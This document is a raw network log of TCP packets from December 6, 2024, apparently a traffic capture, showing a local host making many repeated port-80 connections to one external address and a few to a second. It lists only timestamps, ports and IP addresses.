Dec 6, 2024 03:15:29.066153049 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.117451906 CET	80	50139	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.185995102 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.186069012 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.188620090 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.222729921 CET	80	50139	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.229657888 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.308438063 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.349647045 CET	80	50141	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.349726915 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.349922895 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.469651937 CET	80	50141	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.545578957 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.665553093 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.665589094 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.701613903 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:29.821517944 CET	80	50141	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.889178991 CET	80	50139	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:29.889239073 CET	50139	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.273648024 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.329534054 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.437341928 CET	80	50141	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.483397961 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.544621944 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.592093945 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.701473951 CET	80	50141	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.749545097 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.822707891 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.822710037 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.822710037 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.942645073 CET	80	50142	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.942809105 CET	80	50141	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.942836046 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.942972898 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.943094015 CET	50141	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:30.943188906 CET	80	50140	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:30.943250895 CET	50140	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:31.062720060 CET	80	50142	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:31.295545101 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:31.415445089 CET	80	50142	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:32.067018986 CET	80	50142	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:32.125525951 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:32.329165936 CET	80	50142	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:32.373481989 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:32.453531027 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:32.573568106 CET	80	50143	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:32.574035883 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:32.574035883 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:32.693917036 CET	80	50143	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:32.921535015 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:33.041487932 CET	80	50143	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:33.660131931 CET	80	50143	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:33.701466084 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:33.942401886 CET	80	50143	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:33.982700109 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.056755066 CET	50142	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.059868097 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.060558081 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.179832935 CET	80	50143	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:34.180228949 CET	80	50144	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:34.183674097 CET	50143	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.183676958 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.183769941 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.303495884 CET	80	50144	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:34.531671047 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:34.651592970 CET	80	50144	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:35.271334887 CET	80	50144	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:35.310853004 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.558006048 CET	80	50144	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:35.577256918 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.578279972 CET	50145	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.688191891 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.688819885 CET	50145	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:15:35.697385073 CET	80	50144	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:35.697448969 CET	50144	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.697993040 CET	80	50145	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:35.698056936 CET	50145	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.808130026 CET	80	50146	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:35.808243036 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.808408022 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:35.808517933 CET	80	50145	104.21.2.8	192.168.2.6
Dec 6, 2024 03:15:35.808579922 CET	50145	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:15:35.808636904 CET	50145	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:15:35.928163052 CET	80	50146	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:36.155544043 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:36.276043892 CET	80	50146	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:36.894155979 CET	80	50146	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:36.939549923 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.168284893 CET	80	50146	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:37.217075109 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.294099092 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.294862032 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.414339066 CET	80	50146	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:37.414391041 CET	50146	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.414594889 CET	80	50147	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:37.414661884 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.414803028 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.534531116 CET	80	50147	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:37.764146090 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:37.884567022 CET	80	50147	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:38.499999046 CET	80	50147	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:38.545532942 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:38.752494097 CET	80	50147	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:38.757544994 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:38.873524904 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:38.878448963 CET	80	50147	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:38.885514021 CET	50147	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:38.993386984 CET	80	50148	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:38.993695021 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:38.993695021 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:39.113898039 CET	80	50148	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:39.342171907 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:39.462007999 CET	80	50148	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.080439091 CET	80	50148	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.125515938 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.379898071 CET	80	50148	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.421509981 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.497514009 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.497515917 CET	50149	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.617480993 CET	80	50149	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.617588997 CET	80	50148	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.617631912 CET	50149	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.617712975 CET	50149	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.625510931 CET	50148	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.737507105 CET	80	50149	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.812129021 CET	50149	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.812131882 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.932037115 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:40.932373047 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.932373047 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.933514118 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:40.974497080 CET	80	50149	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.052267075 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.053210020 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.053318024 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:41.053514957 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:41.173295975 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.279649973 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:41.399646044 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.399709940 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.404704094 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:41.517622948 CET	80	50149	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:41.517688990 CET	50149	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:41.524564028 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.018732071 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.060807943 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.138763905 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.201451063 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.254637003 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.295195103 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.410512924 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.417509079 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.441602945 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.501509905 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.538513899 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.545296907 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.639879942 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.689508915 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.758847952 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.758848906 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.761511087 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.879020929 CET	80	50151	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.879270077 CET	50151	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.879441977 CET	80	50150	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.881261110 CET	80	50152	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:42.881464958 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.881468058 CET	50150	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:42.881592989 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:43.001250982 CET	80	50152	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:43.232815027 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:43.352705956 CET	80	50152	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:43.986835003 CET	80	50152	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:44.029570103 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.241287947 CET	80	50152	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:44.241777897 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.353504896 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.361936092 CET	80	50152	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:44.365591049 CET	50152	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.473773956 CET	80	50153	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:44.477570057 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.477691889 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.600033998 CET	80	50153	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:44.829509020 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:44.949438095 CET	80	50153	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:45.563251019 CET	80	50153	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:45.607673883 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:45.798635960 CET	80	50153	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:45.842113018 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:45.923648119 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:45.924998999 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:46.043813944 CET	80	50153	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:46.043874025 CET	50153	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:46.044682980 CET	80	50154	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:46.044756889 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:46.045387983 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:46.166562080 CET	80	50154	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:46.404700041 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:46.524534941 CET	80	50154	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.146855116 CET	80	50154	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.193603039 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.264817953 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.265541077 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.385412931 CET	80	50154	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.385476112 CET	50154	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.385539055 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.385598898 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.385802984 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.388439894 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.505511999 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.508183002 CET	80	50156	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.508245945 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.508421898 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.628318071 CET	80	50156	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.732805967 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.852720976 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.852778912 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:47.857764959 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:47.977763891 CET	80	50156	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:48.471091032 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:48.513936996 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:48.621753931 CET	80	50156	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:48.670186996 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:48.744188070 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:48.797493935 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:48.920470953 CET	80	50156	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:48.967041969 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.040890932 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.041182041 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.041851044 CET	50157	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.161379099 CET	80	50155	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:49.161463022 CET	50155	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.161504030 CET	80	50157	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:49.161561966 CET	50157	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.161700964 CET	80	50156	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:49.161751032 CET	50156	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.161752939 CET	50157	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.281443119 CET	80	50157	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:49.514023066 CET	50157	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:49.634462118 CET	80	50157	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:50.248837948 CET	80	50157	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:50.295197964 CET	50157	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:50.545295000 CET	80	50157	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:50.592051983 CET	50157	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:50.666848898 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:50.666862965 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:50.786734104 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:50.789546967 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:50.793488026 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:50.913167953 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:51.139137983 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:51.259027004 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:51.875339031 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:51.920190096 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.147627115 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:52.201541901 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.339101076 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:52.388910055 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.461704016 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.465486050 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.581789017 CET	80	50158	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:52.585236073 CET	80	50159	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:52.585611105 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.585647106 CET	50158	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.585721970 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:52.705559969 CET	80	50159	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:52.937495947 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.057478905 CET	80	50159	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:53.673513889 CET	80	50159	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:53.717060089 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.749216080 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.749984980 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.869745016 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:53.869766951 CET	80	50159	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:53.869815111 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.869839907 CET	50159	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.869971991 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.872926950 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.989614964 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:53.992623091 CET	80	50161	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:53.992682934 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:53.992822886 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:54.112596035 CET	80	50161	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:54.217497110 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:54.337357044 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:54.337374926 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:54.345484018 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:54.465249062 CET	80	50161	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:54.987301111 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.029576063 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:55.078016996 CET	80	50161	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.123286009 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:55.274291039 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.326405048 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:55.342931032 CET	80	50161	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.388915062 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:55.466013908 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.467469931 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:55.587218046 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.781430006 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:55.781657934 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:55.901427031 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:56.263273954 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:56.310791016 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.384567976 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.384573936 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.385581017 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.504842043 CET	80	50160	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:56.505258083 CET	80	50162	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:56.505319118 CET	80	50161	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:56.505343914 CET	50160	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.505409002 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.505413055 CET	50161	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.506465912 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.626189947 CET	80	50162	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:56.867492914 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:56.987432003 CET	80	50162	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:57.696479082 CET	80	50162	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:57.825889111 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:57.978746891 CET	80	50162	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:58.064630032 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.102993965 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.103739023 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.223242044 CET	80	50162	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:58.223402023 CET	80	50163	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:58.223504066 CET	50162	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.223504066 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.223634958 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.343400955 CET	80	50163	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:58.577481031 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:58.697341919 CET	80	50163	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:59.316406012 CET	80	50163	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:59.389002085 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:59.565552950 CET	80	50163	172.67.186.200	192.168.2.6
Dec 6, 2024 03:15:59.623370886 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:59.949680090 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:15:59.951286077 CET	50164	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.069742918 CET	80	50163	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.069812059 CET	50163	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.070947886 CET	80	50164	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.071007967 CET	50164	80	192.168.2.6	172.67.186.200
